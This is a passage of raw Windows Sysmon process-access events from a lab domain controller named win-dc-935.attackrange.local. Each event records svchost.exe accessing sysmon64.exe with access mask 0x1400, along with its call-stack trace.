13:53:21.494{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001525Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.493{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001524Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.493{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001523Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.493{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001522Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.490{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001521Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.489{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001520Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.489{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001519Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.489{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001518Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.489{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001517Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.489{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001516Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.489{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001515Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.489{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001514Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.488{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001513Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.477{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001512Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.477{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001511Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.477{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001510Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.477{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001509Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.477{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001508Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.477{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001507Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.476{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001506Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.476{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001505Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.476{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001504Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.473{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001503Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.473{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001502Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 